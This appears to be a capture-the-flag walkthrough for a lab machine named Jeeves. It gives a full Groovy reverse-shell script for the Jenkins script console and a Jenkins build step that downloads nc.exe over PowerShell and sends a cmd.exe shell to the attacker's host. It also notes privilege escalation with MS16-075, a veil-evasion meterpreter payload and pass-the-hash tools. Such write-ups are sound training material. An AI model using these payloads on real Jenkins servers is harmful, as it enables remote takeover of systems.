System Info : 
Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586

Nmap Scan :
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT


Hack 1 : (Groovy reverse Shell Script)

- Run dirbuster , wordlist : /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
- You will find Jenkins admin pannel : http://10.10.10.63:50000/askjeeves/ 
- In script console of jenkins , use the below reverse shell : (Replace localhost with your ip and LPORT)
#########################################################################################################
#String host="localhost";
#int port=1234;
#String cmd="cmd.exe";
#Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
#########################################################################################################
- Open listener on your machine


Hack 2 : (Download nc.exe using powershell and send reverse shell using cmd.exe)

- Use the same dirbuster step 
- In the "New Item Section", create free style project and execute powershell commands under "build steps" in "Execute windows batch command" as below : 
##################################################################################################################
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://10.10.14.46/nc.exe', 'nc.exe')}"
#nc.exe 10.10.14.46 4444 -e cmd.exe
##################################################################################################################

- Open nc listener in attackers machine

Privilege Escalation 1 : (Using host potato exploit or MS16-075)

## Link1 - MS16-075 : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
## Link2 - Hot potato exploit: : https://foxglovesecurity.com/2016/01/16/hot-potato/

- I use method of MS16-075 
- I have used "meterpreter reverse shell" creted by "veil-evasion" uploaded by powershell and reverse handled by "msfconsole -r "
- Execute the potato.exe on windows 10 and followed the steps given in link1-MS16-075

Privilege Escallation 2 : (Not tested yet)

- Some hash / secret key is present in jenkins home directory.
- We need to invoke command / use pass-the-hash attack to switch to admin account
- We can crack password using hashcat

## Link3 - Pass-the-hash : https://blog.stealthbits.com/passing-the-hash-with-mimikatz
## Link4 - Pass-the-hash : http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/
## Link5 - All pass-the-hash exe : https://github.com/byt3bl33d3r/pth-toolkit















